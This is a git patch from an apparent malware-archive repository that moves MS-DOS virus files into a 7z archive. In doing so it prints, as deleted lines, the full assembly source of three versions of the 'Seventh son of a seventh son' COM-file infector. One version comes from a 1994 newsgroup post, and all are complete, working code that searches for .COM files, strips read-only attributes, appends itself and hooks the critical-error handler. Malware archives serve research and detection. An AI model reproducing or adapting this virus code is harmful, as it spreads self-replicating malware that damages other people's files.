From 62ca392943e3a5bb330f8b03bfc976f17910011a Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sun, 21 Aug 2022 04:12:28 -0500 Subject: [PATCH] fix/re-organize --- .../0 - 9 Index/Virus.MSDOS.Unknown.7son.asm | 251 ------------------ .../0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm | 232 ---------------- .../0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm | 218 --------------- ...nown.3apa3a.asm => Virus.MSDOS.3apa3a.asm} | 0 MSDOS/Virus.MSDOS.7son.7z | Bin 0 -> 2731 bytes ...known._468.asm => Virus.MSDOS.Azagoth.asm} | 0 ...st_star.asm => Virus.MSDOS.First-Star.asm} | 0 ...nown.1stvirus.asm => Virus.MSDOS.Gogi.asm} | 0 8 files changed, 701 deletions(-) delete mode 100644 MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm delete mode 100644 MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm delete mode 100644 MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm => Virus.MSDOS.3apa3a.asm} (100%) create mode 100644 MSDOS/Virus.MSDOS.7son.7z rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown._468.asm => Virus.MSDOS.Azagoth.asm} (100%) rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm => Virus.MSDOS.First-Star.asm} (100%) rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm => Virus.MSDOS.Gogi.asm} (100%) diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm deleted file mode 100644 index 9e1c79c2..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm +++ /dev/null @@ -1,251 +0,0 @@ -From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994 -Xref: netcom.com alt.comp.virus:506 -Path: netcom.com!ix.netcom.com!netnews -From: Zeppelin@ix.netcom.com (Mr. G) -Newsgroups: alt.comp.virus -Subject: 7th Son Virus -Date: 29 Nov 1994 13:02:59 GMT -Organization: Netcom -Lines: 236 -Distribution: world -Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com> -References: -NNTP-Posting-Host: ix-pas2-10.ix.netcom.com - -;*********************************************************************** -***** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;*********************************************************************** -***** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;*********************************************************************** -***** -;* Dummy program (infected) -;*********************************************************************** -***** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;*********************************************************************** -***** -;* Begin of the virus -;*********************************************************************** -***** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 -vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh ;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check -generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear -read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an -EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of -file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and -jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & -time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;*********************************************************************** -***** -;* Interupt handler 24 -;*********************************************************************** -***** - -ni24: mov al,03 - iret - - -;*********************************************************************** -***** -;* Data -;*********************************************************************** -***** - -generation db 1,1 -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - - - diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm deleted file mode 100644 index 1ca91447..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm +++ /dev/null @@ -1,232 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 2 -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - -FILELEN equ end - start -MINTARGET equ 1000 -MAXTARGET equ -(FILELEN+40h) - - org 100h - - .RADIX 16 - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - -begin: db 4Dh - jmp start - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: call start2 -start2: pop bp - sub bp,0103h - - lea si,[bp+offset begbuf-4] ;restore begin of file - mov di,0100h - movsw - movsw - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - xor dl,dl ;clear the flag - mov ax,3301h - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - mov dx,offset ni24 - 4 ;set new int24 vector - add dx,bp - mov ax,2524h - int 21 - - lea dx,[bp+offset end] ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - mov word ptr [bp+offset nameptr-4],dx - - lea si,[bp+offset grandfather-4] ;check generation - cmp [si],0606h - jne verder - - lea dx,[bp+offset sontxt-4] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[si] ;update generations - xchg ah,al - xor al,al - mov [si],ax - - lea dx,[bp+offset filename-4] ;find first COM-file - xor cx,cx - mov ah,4Eh - int 21 - -infloop: mov dx,word ptr [bp+offset nameptr-4] - call infect - - mov ah,4Fh ;find next file - int 21 - jnc infloop - - pop ds ;restore int24 vector - pop dx - mov ax,2524h - int 21 - - pop dx ;restore ctrl-break flag - mov ax,3301h - int 21 - - push cs - push cs - pop ds - pop es - mov ax,0100h ;put old start-adres on stack - push ax - - ret - - -;**************************************************************************** -;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) -;**************************************************************************** - -infect: cld - - mov ax,4300h ;ask attributes - int 21 - push cx - - xor cx,cx ;clear flags - call setattr - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - lea dx,[bp+offset begbuf-4] - mov ah,3fh - int 21 - - mov al,byte ptr [bp+begbuf-4] ;already infected? - cmp al,4Dh - je return2 - cmp al,5Ah ;or a weird EXE? - je return2 - - call endptr ;get file-length - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - lea dx,[bp+offset start-4] - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - sub ax,4 ;calculate new start-adres - mov word ptr [bp+newbeg-2],ax - - call beginptr ;write new begin of file - mov cx,4 - lea dx,[bp+offset newbeg-4] - mov ah,40h - int 21 - - inc byte ptr [si] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: pop cx ;restore file-attribute -; call setattr - -; ret - - -;**************************************************************************** -;* Changes file-attributes -;**************************************************************************** - -setattr: mov dx,word ptr [bp+offset nameptr-4] - mov ax,4301h - int 21 - ret - - -;**************************************************************************** -;* Subroutines for file-pointer -;**************************************************************************** - -beginptr: mov ax,4200h ;go to begin of file - jmp short ptrvrdr - -endptr: mov ax,4202h ;go to end of file -ptrvrdr: xor cx,cx - xor dx,dx - int 21 - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -begbuf db 0CDh, 20h, 0, 0 -newbeg db 4Dh, 0E9h, 0, 0 -nameptr dw ? -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -grandfather db 0 -father db 0 -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm deleted file mode 100644 index 1d83115b..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm +++ /dev/null @@ -1,218 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh ;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -generation db 1,1 -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm b/MSDOS/Virus.MSDOS.3apa3a.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm rename to MSDOS/Virus.MSDOS.3apa3a.asm diff --git a/MSDOS/Virus.MSDOS.7son.7z b/MSDOS/Virus.MSDOS.7son.7z new file mode 100644 index 0000000000000000000000000000000000000000..c3bdc87168e4257817f54fd735e0c6406a405ac3 GIT binary patch literal 2731 zcmV;c3RLwsdc3bE8~_B(SH5Cs3IG5A0000Z000000000zDLeV#R(}c3T>v8-iRSj; zI5Z5MPC!u!Z&?5XtwFWSx!*S~G6Uj4E{+1=c4u+Wq(0Z@eaOp7VzG3I;Thq!3gd0D=eKEx)Odh99+nG~mwUymsVVUVNOM#hT2^Y`s<=unEs0l>2X4d7)*x%JQ` zhym`@1!9?0?oOO9t4bnV#>yt&P=~8y)lv|RBGrT9VW7=Tw5S%TxVG45r~tEL8l{$o zw98yJe^UfcdhqB(?K!FJe7udP4>{p{zvde6*#IIx)?Em083jN#$^Y0Oy>gZ8ersZaH>PoxRs zD(WMHd%}DF-_}3L>bi#D3CI{Ash7#xf>84NFI9DWZEF1byaG}SO^E5375w)hI}{hx zF%T)OH0%{A?qW4c6vblKC++5~szj0CufU$<6e+jB(h8b}c$9JrLwR9boUekWH+6cb zW)KHN3%mzQEg`c|h`Lx%UYLqfy*?jwrA=k>jQg2ZniWZS$J(YmXfel8nL|1U6NaO7 zlY;@D8ZLB;G*U7T2W`yQd>k=Fc*$^?FhOy5Gg8#9NE6%%#pW*12e#BcE#`o-()il zoN+pJyVV6Pb=~`ChqH|G65l1Nblr1{=2V+rX>ziHL~sV1{HTWMEhpZVkqDZUINM;r zXp`^_v=wE8p~B}|6+e3a&c;<`rVM$=a0vh629`XM0VhJxxur`PoiCRoT88&xRO=fN zrg@Sdl_pPfb23NHs&fjuZa3+(NxIvX!19R9`ae(lu#t#7k4$X46I>8#Uu~`u(wPH7 zjeer|7jWZ@dTH-+FI{5#gl$n=&rx5RW{Z8x(wLY`T3n|rOvo)Qjh(!-%5ab`4B>sf zaasM*ME}ehPj@(u8aX8{-?O6Tx8JsGO#{nXeFhIH{oAMN(J!vPulbDY6tCiH)82E2 zBEm-|?MZ_>gcr~DyS*i_zs>Qf+O=Jh6K5L0h{B=4PTHQ-T)T{4V+2j#0L_4X!TEv&-Yl7LDw&%Wl_O zH&j2)ZsJS7GIxG*}{NFP-Ehg_@F5L6xp|cBcrK zd0*r z7_O|NOF!4U`NU1X%%#?O=F}L;bI_W6)G9wR!%HM zKisKza!4Ro20Hcw3h4v6D|$avT=`g4rwSrVfZPX_b6h`(grh9uve4bfl<&7u(B5+w z79C4d7gDf+767CE$8QBgh? z4YVJO%}zkP(NN!2P~i2X&-)SLy5fe`|FQ%Cu2>GS?`~%)3-Y#96^T=%M|PIs8%T-1 zr*;6Q%Ac>)DU!NaVEj;0srZWSY?rYr(tRax@9 z7lDMR1Y98G<+P@Od|foRz1E&w^R#USlg?Qn<|}I-nsM`6gK9~)=BuoTNtqe5MDS^+ zY)lRmQCTlEX@*2E)`kCdBKj|AsLG!63Sk7pnGOGZms_3JIBH3s^U6P=?pi}VX}VV> zsE3*2P=;VLbx-<_B5@j#Rc8(xvT7 zH-Bxq?zNx!gMxfB5PF;1g&fa=`nq;ar;QKz>ox_clA*=;V@kc)fFJtjcpo_&6W*`` zh{`{0=gQz2u0@l%p!WKbPxIrwK64o$*P?%qONS|h1078$2XeX)5UgKb0Qtmm2T3(z^BG)94BbC zob*H34Tb^T4MJmKy#L4p@I}qgU}fD~$GvqglY}A#wWj8SyvBYw`)$5#I?&h$5mf&6 zQR{&H@^8p+ouDH1bL*J!U^ULhyAvR99QX&8?GXQu1jvR9 zWoE&8B0?_yMkqMV>n-ouKadKIshr*uWFMpv45b&Hb-m9bgGC$ZC5xuo95k8k#dVFh zr;%8eaW4L6{qiCVkx>bt|YT47a4fnpNh*M>!SAA6~xu8}9L`O?%{=+Imv^@p{JXRw|gweyN< zFSte3c_2lftUR#QPl(;~mU#bzEfFG{m!IThe>duRW09s&=3aZC6k1-~uvaEJe-&Yn zzjZeVQluA_POU7yj>EN&yf(_Y$51>T%#OHM~_IN^J zfv#wAIG+;Ws?WeVvd%~|X;Z!Lh;@Dv3mRAdlv)hgmhVXDF&8WdG0GhlxA8s{WU2Fq z{IHm+(&mh6{1qCA!13+$NmO4j94p^ZA@$E|Wv%pwUez;>j9E}|$7*)2KnzSgUZ4OM l28q@I34oFS2MYlJ0V4we0R>$E5C8xSfhr0C7$`2_0026EJ68Yz literal 0 HcmV?d00001 diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm b/MSDOS/Virus.MSDOS.Azagoth.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm rename to MSDOS/Virus.MSDOS.Azagoth.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm b/MSDOS/Virus.MSDOS.First-Star.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm rename to MSDOS/Virus.MSDOS.First-Star.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm b/MSDOS/Virus.MSDOS.Gogi.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm rename to MSDOS/Virus.MSDOS.Gogi.asm